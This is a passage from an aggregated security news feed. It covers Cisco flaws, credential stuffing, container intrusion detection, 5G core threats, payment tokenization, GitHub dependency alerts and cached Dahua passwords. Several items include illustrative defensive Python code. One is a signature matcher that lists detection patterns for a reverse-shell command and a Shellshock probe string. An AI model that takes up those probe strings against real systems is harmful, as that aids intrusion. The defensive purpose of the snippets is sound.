ID theft will allow crooks to create accounts, set up credit cards and make purchases using the identity of the victimised individual or organisation.

DDoS involves assaulting a business’ website with traffic from a network of compromised devices, taking it offline and keeping genuine users out of the picture.

Malware and viruses can have a range of implications and uses, from holding a business to ransom by locking down its mission-critical data to stealing information and passing it on to malicious third parties.

There are plenty of other cyber security obstacles to overcome, but getting to grips with these basic concepts is sensible for small business owners.

Why Am I A Target?

Aside from the small handful of cybercriminals who simply want to cause indiscriminate havoc with their actions, most are motivated by money. And the best way to earn a living if you have underhanded computer skills is to steal and manipulate data in the hope of being able to sell it or profit from its subversion.

Data is the currency of the digital world and stolen information can be sold in large volumes to the highest bidder on the black market. Businesses are typically responsible for significant stores of sensitive information, so they are seen as the perfect target by hackers.

What Are The Consequences of Ignoring Cyber Threats?

With a triumvirate of troubling outcomes from being hit by a cyberattack, small businesses cannot afford to ignore the need to implement a suitable security policy.

Firstly, your reputation will suffer a blow if you become one of the 40 per cent of British businesses hit by an attack each year.

Secondly, the loss of custom that comes in the wake of a breach will bring many fledgeling firms to their knees, with financial woes knocking out almost two-thirds of small businesses that have been successfully attacked.

Thirdly, the legal and regulatory ramifications can be significant, especially in the wake of the GDPR and the steeper fines that firms face if they mishandle customer data. Being sued by individuals and other organisations is also likely, which puts yet more pressure on impacted businesses.

How to Bolster Cyber Security Measures

The first thing to realise about cyber threats is that they can only be faced if everyone involved in a small business, from the latest hires to the members of the board, is aware of these risks and committed to combating them.

Next, you will need to lay down a suitable plan to protect your internal network, simplify it where possible and ensure that it is as robust and resilient in the face of the main cyber threats as possible.

You should also get a handle on the kind of data you are holding, whether it complies with GDPR and whether it is properly secured with encryption. Storing information in a cloud-powered platform can be convenient if you want to avoid the expense of opting for an on-site solution.

Keeping tabs on network traffic, training staff and monitoring internal threats posed by disgruntled employees will all be necessary if you want to have complete peace of mind about the state of your cybersecurity.

Ultimately it is crucial to never become complacent, even if you have put plenty of security measures in place. Cyber threats are always changing and you need to be ready to respond to them, whether you run a small business or a multinational corporation.

 

The post A Short Guide to Cyber Security for Small Businesses appeared first on IT SECURITY GURU.

Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products

Cisco has found over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The tech giant has reported four critical vulnerabilities affecting the Policy Suite to customers.

The flaws, tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376, and CVE-2018-0377, were discovered during internal testing.

Two of these flaws could be exploited by a remote unauthenticated attacker to access the Policy Builder interface and the Open Services Gateway initiative (OSGi) interface.

Access to the Policy Builder interface could allow an attacker to make changes to existing repositories and create new ones, while access to the OSGi interface could allow an attacker to access or change any file accessible by the OSGi process.

An unauthenticated attacker could also modify any data contained in the Policy Builder database.

“A vulnerability in the Policy Builder database of Cisco Policy Suite could allow an unauthenticated, remote attacker to connect directly to the Policy Builder database.” reads the security advisory published by Cisco.

“The vulnerability is due to a lack of authentication. An attacker could exploit this vulnerability by connecting directly to the Policy Builder database. A successful exploit could allow the attacker to access and change any data in the Policy Builder database.”


Cisco also warned of a root account with default and static credentials in the Policy Suite’s Cluster Manager. A remote attacker can exploit the vulnerability to access the account and execute arbitrary commands with root privileges.

Cisco also warned of the presence of seven flaws in the SD-WAN solution, one of which affects the Zero Touch Provisioning service and could be exploited by an unauthenticated attacker to trigger a denial-of-service (DoS) condition.

Other SD-WAN vulnerabilities could allow an authenticated attacker to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges.

Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them has been exploited in attacks in the wild.

Pierluigi Paganini

(Security Affairs – Cisco Policy Suite, security)

The post Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products appeared first on Security Affairs.

Hackers Account For 90 Percent of Login Attempts At Online Retailers

Hackers account for 90% of e-commerce sites' global login traffic, according to a report by cyber security firm Shape Security. They reportedly use programs to apply stolen data acquired on the dark web -- all in an effort to log in to websites and grab something of value like cash, airline points, or merchandise. Quartz reports: These attacks are successful as often as 3% of the time, and the costs quickly add up for businesses, Shape says. This type of fraud costs the e-commerce sector about $6 billion a year, while the consumer banking industry loses out on about $1.7 billion annually. The hotel and airline businesses are also major targets -- the theft of loyalty points is a thing -- costing a combined $700 million every year. The process starts when hackers break into databases and steal login information. Some of the best known "data spills" took place at Equifax and Yahoo, but they happen fairly regularly -- there were 51 reported breaches last year, compromising 2.3 billion credentials, according to Shape. Taking over bank accounts is one way to monetize stolen login information -- in the US, community banks are attacked far more than any other industry group. According to Shape's data, that sector is attacked more than 200 million times each day. Shape says the number of reported credential breaches was roughly stable at 51 last year, compared with 52 in 2016. The best way consumers can minimize these attacks is by changing their passwords.
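As an illustration of the kind of server-side defence that catches this automated traffic, here is a minimal sketch (not Shape Security's product; the thresholds and names are made up for the example) of flagging credential-stuffing sources by their login-failure rate:

```python
from collections import defaultdict, deque
import time

class StuffingDetector:
    """Flag source IPs whose login-failure rate suggests automated
    credential stuffing rather than a human mistyping a password."""

    def __init__(self, max_failures=10, window_seconds=60):
        self.max_failures = max_failures
        self.window = window_seconds
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures

    def record_failure(self, ip, now=None):
        now = time.time() if now is None else now
        q = self.failures[ip]
        q.append(now)
        # Drop failures that fell outside the sliding window.
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) > self.max_failures  # True -> throttle or deny this IP

detector = StuffingDetector(max_failures=5, window_seconds=60)
# Simulate a burst of failed logins from one address, one per second.
flagged = [detector.record_failure("203.0.113.9", now=t) for t in range(7)]
print(flagged)  # first five attempts pass; the sixth and seventh trip the threshold
```

A real deployment would track devices and credentials as well as IPs, since stuffing tools rotate source addresses, but the sliding-window idea is the same.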

Read more of this story at Slashdot.

New Gmail feature could open more users to phishing risks: Government officials

Google is rolling out a sweeping redesign of its popular Gmail service, but federal cybersecurity authorities warn that a key new feature on the system could make its 1.4 billion users more susceptible to dangerous phishing attacks that compromise users’ vital personal information.

View Full Story

ORIGINAL SOURCE: ABC News

The post New Gmail feature could open more users to phishing risks: Government officials appeared first on IT SECURITY GURU.

Hackers Breach Network of LabCorp, US’ Biggest Blood Testing Laboratories

LabCorp, the US’ biggest blood testing laboratories network, announced on Monday that hackers breached its IT network over the weekend. “At this time, there is no evidence of unauthorized transfer or misuse of data,” the company said. “LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation.”

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Hackers Breach Network of LabCorp, US’ Biggest Blood Testing Laboratories appeared first on IT SECURITY GURU.

Alert Logic announces industry-first container security capabilities

Alert Logic, the leading provider of Security-as-a-Service solutions, today announced at the AWS Summit, New York, the industry’s first network intrusion detection system (IDS) for containers, available in Alert Logic Cloud Defender and Threat Manager solutions. This innovation brings organisations powerful new capabilities to inspect network traffic for malicious activity targeting containers, and faster detection of compromises to enhance the security of workloads running on the AWS Cloud.

The Alert Logic network IDS capability supports containers deployed on AWS including Docker, Amazon Elastic Container Service, Kubernetes, CoreOS, and AWS Elastic Beanstalk. Support for additional cloud-deployed containers will be available before the end of the year. The Alert Logic incident console can also now display which containers and hosts might be compromised along with the associated metadata.

Containers enable organisations to leverage the low overhead, power, agility, and security of virtualization with the improved benefit of portability. While the container market is growing fast given these benefits, with an estimated CAGR of 40% through 2020 according to 451 Research, many businesses have delayed container adoption and the related cost and time benefits due to security concerns. Until now, the security industry hasn’t provided the critical ability to inspect the network traffic that targets containers.

“Without real-time detection capabilities, attackers and intruders can lurk within containers installing trojans, malware, ransomware and cryptominers or even corrupting and exfiltrating data,” said Chris Noell, Senior Vice President, Engineering at Alert Logic. “Network intrusion detection is critical to providing the visibility into container attacks that other approaches miss. With Alert Logic, organisations can confidently move forward with their container deployments knowing that they are protected by the only security solution in the market that addresses container visibility at the network layer.”

Customers and Partners Adopt New Network IDS Capabilities for Containers

Accesso Technology, a best-in-class eCommerce, point of sales and ticketing solution provider, helps its clients increase sales and streamline operations and is an early adopter of Alert Logic’s container security innovation.

“As Accesso continues to focus on our industry-leading technology and security infrastructure, we need to ensure our containerized environment is protected without introducing additional complexity,” said William DeMar, Director, Information Security, Accesso Technology. “With Alert Logic, we have extended IDS security monitoring and detection to the container level and have gained more granular visibility into our container environments across multiple cloud platforms. Alert Logic partnered with us to get up and running quickly, and their team of security analysts and consultants proactively escalates incidents so we can prioritise our team’s efforts.”

Wealth Wizards is another Alert Logic customer using the new network IDS capability for containers. “We’re writing products our financial services clients want today, which means we need to build software really quickly,” said Richard Marshall, Head of Platform, Wealth Wizards. “We run in a 100% container environment, using Kubernetes and Docker. Security is a big priority for us, but we need to keep our engineering team focused on delivering the best experience for our clients. With Alert Logic we can concentrate on our core business while being safe in the knowledge we have security experts covering the operational side for us.”

Logicworks, a cloud automation and managed services company, partners with Alert Logic and has extended network IDS for containers capabilities to its customers. “Although container technology is relatively new, it’s already a ‘go to’ code deployment strategy for Logicworks,” said Steven Zeller, Vice President, Product Marketing for Logicworks. “Containers help our customers work smarter, and Logicworks ensures that our customers’ containers run securely and efficiently on AWS. Alert Logic’s container security solutions give our customers confidence in the continuous security of their cloud infrastructure.”

Products + Services Approach

The Alert Logic container security solutions work by analysing the signature of data packets as they traverse the container environment to detect cyberattacks in real-time and provide a graphical representation of the compromised container and its relationships. The intrusion detection capabilities for containers are fully managed by Alert Logic’s 24×7 security and compliance experts in the company’s Security Operations Centers. When a container threat is detected, Alert Logic’s security experts prioritise the threat, proactively escalate within 15-minutes, provide visual context, and offer remediation advice for customers.
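Alert Logic's detection engine is proprietary, but the general technique it describes, matching byte signatures against packet payloads as they traverse the container network, can be sketched in a few lines. The signatures and labels below are invented for illustration only:

```python
# Toy byte-signature matcher of the kind a network IDS applies to
# packet payloads. Real rule sets are far larger and include protocol
# decoding; these patterns are illustrative, not production signatures.
SIGNATURES = {
    b"/bin/sh -i": "reverse-shell attempt",
    b"xmrig": "cryptominer download",
    b"() { :;};": "Shellshock probe",
}

def inspect_payload(payload: bytes):
    """Return (signature_name, offset) for the first match, else None."""
    for pattern, name in SIGNATURES.items():
        offset = payload.find(pattern)
        if offset != -1:
            return name, offset
    return None

hit = inspect_payload(b"GET /cgi-bin/x HTTP/1.1\r\nUser-Agent: () { :;}; echo pwned\r\n")
print(hit)  # ('Shellshock probe', 37)
```

On a match, a production system would attach container metadata (image, pod, host) to the alert, which is the context the incident console described above provides.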

The post Alert Logic announces industry-first container security capabilities appeared first on IT SECURITY GURU.

Be Ready to Fight new 5G Vulnerabilities

In the evolving landscape of mobile networks, we are beginning to see new vulnerabilities open up through 3G and 4G networks, and it is more than likely that 5G will follow the same fate. Protecting only the Gi interface is no longer enough for service provider security.

 

Until recently, the Gi-LAN connecting the EPC (Evolved Packet Core) to the internet was considered to be the most vulnerable part of the service provider network and was protected via Gi-firewall and anti-DDoS systems. The rest of the EPC links were considered difficult targets for hackers because advanced vendor-specific knowledge was required for a successful attack. Since the typical hacker prefers a soft target, defensive measures weren’t a priority for developers or carriers. Network complexity was a defence in itself.

 

However, the requisite know-how to attack the EPC from other interfaces is now becoming much more common. Mobile endpoints are being infected at an alarming rate, and this means that attacks can come in from the inside of the network. The year 2016 saw a leap in malware attacks, including headline-makers Gooligan, Pegasus, and Viking Horde. Then the first quarter of 2017 saw a leap in mobile ransomware attacks, which grew by 250 percent.

 

The need for securing the EPC is tied to advances like LTE adoption and the rise of IoT, which are still gaining speed. LTE networks grew to 647 commercial networks in 2017, with another 700 expected to launch this year. With the adoption of LTE, IoT has become a reality—and a significant revenue stream for enterprises, creating a market expected to reach £400 billion by 2022. The time to take a holistic approach to securing the service provider networks has arrived.

There are three primary data paths connecting mobile service providers to the outside world. The first of these is a link to the internet through S/Gi LAN. Next is a link to a partner network that serves roaming users. Last, there is a link for traffic coming from towers. The security challenges and the attack vectors are different on each link. Until recently, the link to the internet was the most vulnerable point of connectivity. DDoS attacks frequently targeted the service provider’s core network on the Gi Link. These attacks were generally volumetric in nature and were relatively easy to block with highly scalable firewalls and DDoS mitigation systems.

 

The Expanding Attack Surface

The threat landscape is rapidly changing, and attacks can come from other points of connectivity. This has been theoretical until recently; while numerous academic research papers have been published in the past decade suggesting that attacks from partner networks or radio access networks (RANs) were a possibility, those threats are no longer merely an intellectual exercise: they are real. At the same time, the rapid rise of IoT is exposing the threat of malicious actors taking control and weaponising devices against a service provider.

 

Multiple botnets, such as WireX and its variants, have been found and taken down. So far, these attacks have targeted hosts on the internet, but it’s just a matter of time until they start attacking Evolved Packet Core (EPC) components.

 

There are multiple weak points in EPC and its key components. Components that used to be hidden behind proprietary and obscure protocols now reside on IP, UDP, or SCTP, which can be taken down using simple DoS attacks.

 

The attack surface is significantly larger than it used to be, and legacy approaches to security will not work.

 

A DDoS attack against an individual entity, such as a signaling storm, can be generated by a malicious actor or even a legitimate source. For example, a misbehaving protocol stack in an IoT device can cause an outage by generating a signaling storm.
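One common way to surface a signaling storm, whether malicious or caused by a buggy device stack, is rate-outlier detection: compare each device's signaling-message count in a sampling interval against the population norm. A minimal sketch (the threshold and device names are illustrative, not from any vendor's product):

```python
from collections import Counter

def find_storm_sources(events, threshold_multiplier=10):
    """events: iterable of device IDs, one entry per signaling message
    observed in the sampling interval. Returns the set of devices
    emitting more than threshold_multiplier times the median rate."""
    counts = Counter(events)
    rates = sorted(counts.values())
    median = rates[len(rates) // 2]
    return {dev for dev, n in counts.items() if n > threshold_multiplier * median}

# 99 well-behaved devices send 3 messages each; one device floods 500.
sample = [f"dev{i}" for i in range(99) for _ in range(3)] + ["dev-bad"] * 500
print(find_storm_sources(sample))  # {'dev-bad'}
```

A median-relative threshold adapts as legitimate traffic grows, which matters on networks where IoT device counts are rising quickly.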

 

Securing the SP Network

 

To secure the SP network, businesses must improve their defences against DDoS attacks. The best way to achieve this is by utilising an S/Gi firewall solution alongside a DDoS mitigation solution. A threat protection system (TPS) should also be deployed across your enterprise’s on-premise and cloud IT infrastructure. With all of these solutions in place, it becomes easier to mitigate multi-terabit attacks.

 

Powerful tools that improve these defences can help security professionals detect and mitigate, or stop, a number of advanced attacks aimed specifically at the EPC. These tools should also provide granular deep packet inspection to protect against user impersonation by means of spoofing, network impersonation, and signalling attacks.

 

To summarise, in addition to mitigating and stopping terabit-scale attacks coming from the internet and utilising stateful firewall services, it is imperative that enterprises step up their security measures by deploying full-spectrum security that protects the whole of their infrastructure.

 

The post Be Ready to Fight new 5G Vulnerabilities appeared first on IT SECURITY GURU.

SN 672: All Up in Their Business

This week we look at even MORE, new, Spectre-related attacks, highlights from last Tuesday's monthly patch event, advances in GPS spoofing technology, GitHub's welcome help with security dependencies, Chrome's new (or forthcoming) "Site Isolation" feature, when hackers DO look behind the routers they commandeer, the consequences of deliberate BGP routing misbehavior... and reading between the lines of last Friday's DOJ indictment of the US 2016 election hacking by 12 Russian operatives -- the US appears to really have been "all up in their business."

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

Radware Blog: The Evolving Network Security Environment – Can You Protect Your Customers in a 5G Universe?

Smart Farming depends on internet of things (IoT) devices and sensors to monitor vast farm fields, guiding farmers’ decisions about crop management through rich data. But it only takes one security flaw for all stakeholders within the ecosystem to be impacted. If hackers gain access to a single sensor, they can navigate their way to […]

The post The Evolving Network Security Environment – Can You Protect Your Customers in a 5G Universe? appeared first on Radware Blog.



Radware Blog

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access

The Consumer Technology Association (CTA) is supporting the proposed ENCRYPT ACT which forbids the manufacturers of the technology to weaken

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access on Latest Hacking News.

BSidesLV Preview: Planning For The Worst, and Watch Out For That Bus!

Bad circumstances happen to us and our technology. Fire, flood, sickness, and death can surprise us, our families, and our technology. While we may not be able to control all aspects of life, we can be prepared. At any time, you might metaphorically get hit by a bus. While I felt that I had reasonable […]… Read More

The post BSidesLV Preview: Planning For The Worst, and Watch Out For That Bus! appeared first on The State of Security.

Two thirds embarrassed by their out of date tech

A study of 1000 UK adults, carried out in May 2018, showed that the main reason people upgrade their smartphone is due to the embarrassment of having an older handset, rather than the desire to have the latest tech.

 

Despite mobile technology drastically improving in recent years, the research, by Satsuma Loans, revealed that 63% of respondents would be embarrassed if their peers saw them using a handset that was more than a couple of years old, and this would impact their decision to upgrade more than their desire to have new features.

 

When it comes to which age group feel most embarrassed by their out of date tech, surprisingly more respondents aged 45-54 admitted to feeling embarrassed by their phone than any other age group.

 

According to the study, the top five reasons for upgrading are:

  • Embarrassment of using an old handset (63%)
  • Peer pressure to fit in with others (59%)
  • Desire to always have the latest tech (51%)
  • Coming to the end of a phone contract (43%)
  • Desire to have a specific new feature (27%)

 

Looking at how often people involved in the study upgrade their phone, the majority (61%) upgrade each time they reach the end of their current contract; however, 14% admitted they try to upgrade every six months – spending over £1000 a year on their mobile phone handset.

 

At the other end of the scale, one in ten adults surveyed stated that they believe smartphones are a waste of money and are happy with a basic handset. As well as the initial cost of the phone handset and monthly contract payments, there are also a number of hidden costs associated with owning a smartphone. Hidden costs to consider include:

  • Insurance – insurance for top of the range phones can be as high as £14.99 per month
  • Cases, covers and screen protectors – without them you could be looking at a hefty bill for fixing a smashed handset after an accident
  • Cloud storage and backups – if you don’t back up you risk losing all of your precious photos and videos if you lose or damage your handset
  • Anti-virus protection – even the most tech-savvy can be caught out by malware

The post Two thirds embarrassed by their out of date tech appeared first on IT SECURITY GURU.

Securing real-time payments with tokenization

For banks, direct debit (ACH) fraud represents a bigger financial risk than card fraud. In particular, growing momentum for real-time payment schemes across the world is creating huge opportunities for fraudsters and placing increasing pressure on banks and clearing houses, who now have only seconds instead of days to identify fraudulent transactions.

There are various security approaches available to banks in the fight against fraud, but tokenization has already proved successful in protecting in-store and online card payments, with all the major payment systems, digital wallets and original equipment manufacturers adopting the technology.

By replacing unique sensitive information or data with a context-specific proxy, tokenization can significantly reduce the risk and impact of account-based fraud and foster safe, secure real-time payment initiatives across the world.

Adding tokenization to the real-time security mix

Financial institutions already deploy various techniques to prevent and mitigate ACH fraud.

Banks coordinate with agencies such as OFAC (Office of Foreign Assets Control) in the US and OFSI (Office of Financial Sanctions Implementation) in the UK to share intelligence and monitor suspicious entities or actions.

At a more practical level, out of pattern activity identifies irregular or unusual transactions, transaction limits help prevent high-value fraud, and ACH block services aim to root out unauthorized senders and recipients.

But it is old-fashioned manual review that continues to be a mainstay of bank processes. According to research from the Federal Reserve Bank of Minneapolis, 83% of banks in the US use this as a primary line of defense. This is simply not compatible with real-time payments, and banks recognize the inherent limitations, with 43 per cent admitting it was “somewhat effective or ineffective”.

Tokenization is not a silver bullet. Rather, it is a process that should be considered as complementary to all existing anti-fraud measures, adding another robust layer of security and bringing unique benefits.

Mitigating account-based fraud

It is a hostile world, and for many organisations data breaches are more a case of ‘when’, not ‘if’.

Payment account tokenization mitigates the impact of data breaches when they are attempted, as sensitive account information is not stored in its raw form. This reduces the risk of stolen account numbers being used to commit transactional fraud, for example.

Similarly, control parameters limit how tokens can be used. So, if a token can only be used to pay a monthly direct debit to a specific merchant, it cannot then be used fraudulently to perform several person-to-person transactions on the same day.

Importantly, as an underlying single account credential can have multiple tokens associated with it supporting specific use-cases, banks can tailor the controls and limits they wish to put in place. If one is compromised, it can be quickly and easily replaced without impacting the main account credential or other associated tokens.
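The vault model described above, multiple controlled tokens per account credential, revocable without touching the account, can be sketched in a few lines. This is a toy illustration, not a payment-scheme specification; the control fields (merchant binding, daily use limit) are examples of the kind of parameters discussed, not a standard:

```python
import secrets

class TokenVault:
    """Toy sketch of payment-account tokenization: one account credential
    can back several tokens, each with its own usage controls, and a
    compromised token is replaced without affecting the account itself."""

    def __init__(self):
        self._tokens = {}  # token -> {account, controls, usage}

    def issue(self, account_number, merchant=None, max_uses_per_day=None):
        token = secrets.token_hex(8)  # opaque proxy for the real credential
        self._tokens[token] = {
            "account": account_number,
            "merchant": merchant,            # None = not merchant-bound
            "max_uses_per_day": max_uses_per_day,
            "uses_today": 0,
        }
        return token

    def authorize(self, token, merchant):
        entry = self._tokens.get(token)
        if entry is None:
            return False  # unknown or revoked token
        if entry["merchant"] is not None and entry["merchant"] != merchant:
            return False  # token is bound to a different merchant
        limit = entry["max_uses_per_day"]
        if limit is not None and entry["uses_today"] >= limit:
            return False  # daily control exceeded
        entry["uses_today"] += 1
        return True

    def revoke(self, token):
        self._tokens.pop(token, None)  # the account credential is unaffected

vault = TokenVault()
dd_token = vault.issue("GB29NWBK60161331926819", merchant="ElectricCo", max_uses_per_day=1)
print(vault.authorize(dd_token, "ElectricCo"))   # True: the monthly direct debit
print(vault.authorize(dd_token, "SomeoneElse"))  # False: bound to one merchant
```

In a systemic deployment the vault would sit with the central bank or clearing house, as the article notes, and token formats would mirror the original credential so existing routing and validation continue to work.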

Faster, safer, easier

Tokenization as a technology is suitable to support multiple payment use cases via a single system, ensuring emerging commercial models and the ability to adapt to new requirements are not constrained by an inflexible security framework.

Also, tokens route normally through the payments systems and networks, so consumers and businesses can send and accept payments as normal with no change in authorizations. Depending on the system and token usage, tokens can be formatted and validated in the same way as the original credential, allowing non-disruptive use in an existing ecosystem to enable the swift onboarding of member financial institutions. And for new services, the token format can be simplified for frictionless use by the consumer.

For payment account tokenization to be effective, however, the infrastructure must be implemented at a systemic level.

This means Central Banks and Automated Clearing Houses have a crucial role to play in tokenizing the account numbers and managing the token vault – the centralized and highly secure server where the issued tokens and the account numbers they represent are stored.

Account-based tokenization beyond security

The main aim of tokenization is to protect account credentials to increase security.

There is an opportunity for banks, though, to take a wider view on the strategic use and potential of tokenization. Account-to-account based payment services, such as mobile payments and P2P, are increasingly popular following the introduction of regulation such as PSD2. Banks can use tokenization as a means to build stronger trust with customers through the provision of ever-simpler and seamless account-to-account payments.

 

The post Securing real-time payments with tokenization appeared first on IT SECURITY GURU.

Organisations need a zero trust model for cyber security, Unisys survey finds

New research from Unisys Corporation found that IT professionals reported an average of three incidents last year in which sensitive information was lost, with some respondents reporting 11 losses for the year. Respondents also reported an average of nine incidents per month in which they had to address highly severe security issues.

The survey, conducted by information insights company Information Services Group Inc. (ISG), asked 404 enterprise IT professionals in North America, Europe and Asia Pacific to assess their security operations. The findings illustrate high levels of awareness among respondents of their challenges as well as the need to establish digital trust with their customers as they transform their businesses to cloud and mobile platforms.

As a result of these findings, ISG is forecasting that 60 percent of businesses globally will suffer a major service failure due to the new security issues introduced by shifting workloads to the cloud and enabling mobile and remote employees. The research indicates that between 2016 and 2020, on-premises workloads will decline from 55 percent to 20 percent of all workloads.

To address the challenges associated with digital trust, Unisys recommends the adoption of the “zero trust” model – an approach to security that recognizes threats emanate not only from outside the perimeter, but also from malicious insiders within trusted zones. The zero trust approach of granting least privileged access to all users requires a combination of microsegmentation and security services such as security information and event management (SIEM), endpoint protection and risk assessment, eliminating the need to buy new gear, rip and replace or add complexity to an already unwieldy architecture.
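The “least privileged access” core of zero trust boils down to a default-deny check on every request, regardless of network location. Here is a deliberately tiny Python sketch; the identities, resources, and policy table are invented for illustration, and real deployments enforce this with microsegmentation, identity providers, and SIEM correlation rather than a dictionary.

```python
# Default-deny policy: an action is permitted only if the exact
# (identity, resource) pair is explicitly granted it. Being "inside
# the perimeter" confers nothing.
ALLOW = {
    ("alice@corp.example", "hr-db"): {"read"},
    ("backup-svc", "hr-db"): {"read"},
    ("alice@corp.example", "payroll-app"): {"read", "write"},
}

def is_authorized(identity: str, resource: str, action: str) -> bool:
    # Unknown identities and unlisted resources fall through to the
    # empty set, so the answer is "no" unless explicitly "yes".
    return action in ALLOW.get((identity, resource), set())
```

Even a trusted insider gets only the actions the policy names; everything else, including requests from previously compromised accounts, is refused by default.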

“In the era of digital transformation, security professionals recognize that digital trust is table stakes – a requirement that, if not met and delivered as part of the experience for stakeholders of the enterprise’s value chain, will upend organizations everywhere,” said Doug Saylors, research director, ISG. “Enterprises that are first to adopt and leverage digital trust fabrics will realize competitive advantages driven by combinations of deeper customer intimacy, operational excellence and product leadership.”

The survey showed that IT professionals recognize the need to address threats coming from outside their enterprises as well as the need to create security-focused cultures within them.

When asked to choose from among 12 IT security challenges at their enterprises, the top challenge was “external threats,” selected by 43 percent of respondents. It was followed by security challenges related to 24×7 operations (selected by 36 percent) and challenges related to legacy technologies (selected by 34 percent).

“Trust in digital business is earned during every digital interaction with the enterprise,” said Tom Patterson, chief trust officer at Unisys. “This means establishing strong bonds of trust throughout their ecosystems of employees, partners, suppliers and customers. By operating resistant and resilient systems, establishing trusted identities, and focusing passionately on client success, it is possible to make trust your critical success factor.”

Unisys Security Solutions protect critical assets by establishing digital trust and providing secure access to trusted users. Unisys solutions help enterprises reduce their attack surface, easily comply with regulations and simplify the complexity of today’s network security. Combining expert consultants, advanced software and managed security services, Unisys helps enterprises build security into the fabric of their digital transformation.

The post Organisations need a zero trust model for cyber security, Unisys survey finds appeared first on IT SECURITY GURU.

Code hosting service GitHub can now scan also for vulnerable Python code

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed obtaining a significant reduction of vulnerable code libraries on the platform.

GitHub alerts warn developers when they include certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company announced it would add support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. GitHub notified affected users, and by December 1 more than 450,000 of the vulnerabilities had been addressed, either by updating the affected library or removing it altogether.

In the vast majority of cases, active developers address vulnerabilities within a week.

With Python now supported, developers can also receive alerts for vulnerabilities in the dependencies of their Python projects.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories maintainers need to opt in to security alerts by giving the dependency graph access to the repo from the “Insights” tab.
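Conceptually, the alerting pipeline is a lookup of pinned dependencies against an advisory database. The following Python sketch is a toy version: the ADVISORIES table and the `scan_requirements` helper are illustrative, not GitHub's implementation, though the Flask entry reflects a real advisory (CVE-2018-1000656, fixed in Flask 0.12.3).

```python
# Toy dependency vulnerability scan: parse pinned requirements and flag
# any (package, version) present in an advisory database. GitHub's real
# database draws on the NVD feed and community reports.
ADVISORIES = {
    ("flask", "0.12.2"): "CVE-2018-1000656: denial of service via crafted JSON",
    ("django", "1.11.0"): "hypothetical advisory for illustration",
}

def scan_requirements(text: str) -> list:
    alerts = []
    for line in text.splitlines():
        line = line.split("#")[0].strip()   # drop comments and blanks
        if "==" not in line:
            continue                        # only exact pins are checkable here
        name, _, version = line.partition("==")
        key = (name.strip().lower(), version.strip())
        if key in ADVISORIES:
            alerts.append("%s==%s: %s" % (key[0], key[1], ADVISORIES[key]))
    return alerts
```

Running this over a `requirements.txt` containing `flask==0.12.2` would produce one alert; the real service additionally suggests a fixed version to upgrade to.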

Pierluigi Paganini

(Security Affairs – hacking, secure coding)

The post Code hosting service GitHub can now scan also for vulnerable Python code appeared first on Security Affairs.

Researchers Mount Successful GPS Spoofing Attack Against Road Navigation Systems

Academics say they’ve mounted a successful GPS spoofing attack against road navigation systems that can trick humans into driving to incorrect locations. The research is of note because previous GPS spoofing attacks have been unable to trick humans, who, in past experiments, often received malicious driving instructions that didn’t make sense or were not in sync with the road infrastructure (for example, taking a left on a straight highway).

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Researchers Mount Successful GPS Spoofing Attack Against Road Navigation Systems appeared first on IT SECURITY GURU.

UN agency tasks member states on greater attention to cyber security

Babcock International Model United Nations (BIMUN) has urged member states to pay more attention to cyber security and broaden its definition beyond hacking to enhance implementation of broader solutions. It stated this at the simulation of the UN General Assembly First Committee on Disarmament and International Security (DISEC), during the second BIMUN conference, organised by Babcock University, Ilishan Ogun State, in collaboration with the United Nations Information Centre (UNIC), Lagos at the weekend.

View Full Story

ORIGINAL SOURCE: Guardian

The post UN agency tasks member states on greater attention to cyber security appeared first on IT SECURITY GURU.

Passwords For Tens of Thousands of Dahua Devices Cached In IoT Search Engine

An anonymous reader writes: "Login passwords for tens of thousands of Dahua devices have been cached inside search results returned by ZoomEye, a search engine for discovering Internet-connected devices (also called an IoT search engine)," reports Bleeping Computer. A security researcher has recently discovered that instead of just indexing IoT devices, ZoomEye is also sending an exploitation package to devices and caching the results, which also include cleartext DDNS passwords that allow an attacker remote access to these devices. Searching for the devices is trivial and simple queries can unearth tens of thousands of vulnerable Dahua DVRs. According to the security researcher who spotted these devices, the trick has been used in the past year by the author of the BrickerBot IoT malware, the one who was on a crusade last year, bricking unsecured devices in an attempt to have them go offline instead of being added to IoT botnets.

Read more of this story at Slashdot.

Trump might ask Putin to extradite the 12 Russian intelligence officers

